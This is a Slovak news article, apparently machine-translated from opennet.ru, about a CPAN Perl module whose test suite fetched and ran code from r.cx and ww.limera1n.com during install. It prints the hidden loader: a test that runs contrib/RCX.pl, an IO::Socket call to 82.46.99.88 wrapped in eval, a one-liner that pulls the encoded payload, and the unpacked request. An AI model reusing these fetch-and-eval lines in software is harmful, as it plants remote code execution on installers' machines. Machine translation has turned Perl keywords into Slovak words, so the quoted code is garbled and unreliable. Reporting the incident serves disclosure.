V balíku Perl distribuovanom prostredníctvom adresára CPAN , navrhnutý tak, aby automaticky načítal moduly CPAN za behu, škodlivý kód. Škodlivá vložka bola v testovacom kóde , ktorá sa expeduje od roku 2011.
Je pozoruhodné, že sa objavili otázky týkajúce sa načítania pochybného kódu ešte v roku 2016.
Škodlivá aktivita sa scvrkáva na pokus o stiahnutie a spustenie kódu zo servera tretej strany (http://r.cx:1/) počas vykonávania testovacieho balíka spusteného pri inštalácii modulu. Predpokladá sa, že kód pôvodne stiahnutý z externého servera nebol škodlivý, ale teraz je požiadavka presmerovaná na doménu ww.limera1n.com, ktorá poskytuje svoju časť kódu na vykonanie.
Usporiadanie sťahovania do súboru Používa sa nasledujúci kód:
môj $prog = __FILE__;
$prog =~ s{[^/]+\.t}{../contrib/RCX.pl}x;
my $try = `$^X $prog`;
Zadaný kód spôsobí spustenie skriptu , ktorého obsah je zredukovaný na riadok:
použite lib do{eval&&botstrap("RCX")if$b=new IO::Socket::INET 82.46.99.88.":1″};
Tento skript sa načítava pomocou služby kód z externého hostiteľa r.cx (kódy znakov 82.46.99.88 zodpovedajú textu "R.cX") a vykoná ho v bloku eval.
$ perl -MIO::Socket -e’$b=new IO::Socket::INET 82.46.99.88.”:1″; vytlačiť ;'
eval rozbaliť u=>q{_<‘)I;G1[)&(];F5W($E/.CI3;V-K970Z.DE….}
Po rozbalení sa nakoniec vykoná nasledovné: :
print{$b=new IO::Socket::INET"ww.limera1n.com:80″}"GET /iJailBreak
";upozornenie na návrat $@zatiaľ$b;1
Problémový balík bol teraz odstránený z úložiska. (Perl Authors Upload Server) a účet autora modulu je zablokovaný. V tomto prípade modul stále zostáva v archíve MetaCPAN a možno ho nainštalovať priamo z MetaCPAN pomocou niektorých nástrojov, ako je cpanminus. že balík nebol široko distribuovaný.
Zaujímavé na diskusiu a autor modulu, ktorý poprel informáciu, že škodlivý kód bol vložený po napadnutí jeho stránky „r.cx“ a vysvetlil, že sa len zabával a nepoužíval perlobfuscator.com na to, aby niečo skryl, ale na zmenšenie veľkosti kódu a zjednodušenie jeho kopírovania cez schránku. Výber názvu funkcie „botstrap“ sa vysvetľuje skutočnosťou, že toto slovo „znie ako bot a je kratšie ako bootstrap“. Autor modulu tiež uistil, že identifikované manipulácie nevykonávajú škodlivé akcie, ale iba demonštrujú načítanie a spustenie kódu cez TCP.
Zdroj: opennet.ru